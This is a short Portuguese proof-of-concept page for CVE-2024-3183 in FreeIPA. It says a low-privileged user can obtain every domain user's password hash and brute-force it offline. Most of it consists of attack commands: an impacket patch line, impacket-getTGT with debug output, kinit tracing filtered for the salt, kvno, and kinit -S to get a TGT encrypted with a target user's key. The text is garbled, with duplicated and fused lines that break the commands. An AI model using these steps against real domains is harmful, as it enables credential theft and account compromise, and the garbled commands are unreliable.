
POC para CVE-2024-3183 (FreeIPA Rosting)
POC para CVE-2024-3183 (FreeIPA Rosting)
Impacto: Um usuário com baixos privilégios pode obter um hash das senhas de todos os usuários do domínio e realizar força bruta offline (kerberoasting).
Patch do impacket-getTGT:
decoder.decode.defaultErrorState = stGetValueDecoderByTag a impacket/krb5/kerberosv5.py.decoder.decode.defaultErrorState = stGetValueDecoderByTag a impacket/krb5/kerberosv5.py.-service e a opção -debug para obter o salt em um único comando.
impacket-getTGT test.local/user -debug -service adminkinit user

printf "%b" "0\n" | KRB5_TRACE=/dev/stdout kinit admin | grep salt

kvno admin


1 - TGS, 2 - SALT, 3 - Senhas.
kinit -S target usere você obtém um TGT que é criptografado pela chave do usuário alvo.